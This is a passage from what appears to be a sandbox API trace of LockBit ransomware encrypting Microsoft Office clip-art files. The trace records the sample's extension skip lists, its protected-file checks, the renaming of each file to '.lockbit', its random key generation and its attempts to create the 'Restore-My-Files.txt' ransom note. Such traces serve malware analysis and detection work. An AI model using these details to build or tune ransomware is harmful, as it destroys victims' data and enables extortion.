returned -1 [0152.152] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.152] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0212953.WMF") returned 1 [0152.153] lstrcmpiW (lpString1="ntldr", lpString2="J0212953.WMF") returned 1 [0152.153] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0212953.WMF") returned 1 [0152.153] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0212953.WMF") returned -1 [0152.153] lstrcmpiW (lpString1="autorun.inf", lpString2="J0212953.WMF") returned -1 [0152.153] lstrcmpiW (lpString1="thumbs.db", lpString2="J0212953.WMF") returned 1 [0152.153] lstrcmpiW (lpString1="iconcache.db", lpString2="J0212953.WMF") returned -1 [0152.153] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.153] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212953.WMF") returned=".WMF" [0152.153] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.153] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.153] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.154] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.154] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.154] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.154] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.154] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.154] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.154] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.154] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.154] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.154] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.154] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212953.WMF.lockbit") returned 72 [0152.154] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212953.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212953.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0152.155] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.155] malloc (_Size=0x40068) returned 0x3e70008 [0152.155] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=7498) returned 1 [0152.155] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.155] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0152.155] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0152.156] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0152.160] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212953.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212953.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.160] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.160] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.160] free (_Block=0x1fa2ed8) [0152.160] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212953.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.161] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.161] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.161] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56583130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0213243.WMF", cAlternateFileName="")) returned 1 [0152.161] lstrcmpiW (lpString1=".", lpString2="J0213243.WMF") returned -1 [0152.161] lstrcmpiW (lpString1="..", lpString2="J0213243.WMF") returned -1 [0152.161] PathFindExtensionW (pszPath="J0213243.WMF") returned=".WMF" [0152.161] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.161] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.161] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.161] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.161] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.161] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.161] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.161] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.161] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.161] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.161] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.161] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.162] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.162] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.163] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.163] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.163] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.163] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.163] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.163] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.163] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.163] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.163] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.163] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.163] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.163] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.163] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0213243.WMF") returned 1 [0152.163] lstrcmpiW (lpString1="ntldr", lpString2="J0213243.WMF") returned 1 [0152.163] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0213243.WMF") returned 1 [0152.163] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0213243.WMF") returned -1 [0152.163] lstrcmpiW (lpString1="autorun.inf", lpString2="J0213243.WMF") returned -1 [0152.163] lstrcmpiW (lpString1="thumbs.db", lpString2="J0213243.WMF") returned 1 [0152.163] lstrcmpiW (lpString1="iconcache.db", lpString2="J0213243.WMF") returned -1 [0152.163] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.163] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0213243.WMF") returned=".WMF" [0152.164] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.164] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.164] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.165] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.165] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.165] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.165] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.165] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.165] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.165] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0213243.WMF.lockbit") returned 72 [0152.165] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0213243.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0213243.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0152.165] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.165] malloc (_Size=0x40068) returned 0x3df0008 [0152.166] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2652) returned 1 [0152.166] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0152.166] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.167] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0152.167] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0152.183] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0213243.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0213243.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.183] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.183] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.184] free (_Block=0x1fa2ed8) [0152.184] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0213243.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.184] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.184] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.185] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6607e0d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xf00, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0213449.WMF", cAlternateFileName="")) returned 1 [0152.185] lstrcmpiW (lpString1=".", lpString2="J0213449.WMF") returned -1 [0152.185] lstrcmpiW (lpString1="..", lpString2="J0213449.WMF") returned -1 [0152.185] PathFindExtensionW (pszPath="J0213449.WMF") returned=".WMF" [0152.185] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.185] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.186] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.186] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.187] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.187] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.187] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.187] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.187] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.187] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.187] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.187] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0213449.WMF") returned 1 [0152.187] lstrcmpiW (lpString1="ntldr", lpString2="J0213449.WMF") returned 1 [0152.187] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0213449.WMF") returned 1 [0152.187] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0213449.WMF") returned -1 [0152.187] lstrcmpiW (lpString1="autorun.inf", lpString2="J0213449.WMF") returned -1 [0152.187] lstrcmpiW (lpString1="thumbs.db", lpString2="J0213449.WMF") returned 1 [0152.187] lstrcmpiW (lpString1="iconcache.db", lpString2="J0213449.WMF") returned -1 [0152.187] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.187] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0213449.WMF") returned=".WMF" [0152.187] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.187] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.187] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.187] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.187] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.187] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.187] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.188] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.188] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0213449.WMF.lockbit") returned 72 [0152.189] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0213449.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0213449.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0152.189] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.189] malloc (_Size=0x40068) returned 0x1ff1e60 [0152.189] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3840) returned 1 [0152.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0152.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0152.191] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0152.195] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0213449.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0213449.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.195] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.195] NtSetInformationFile (FileHandle=0x170, 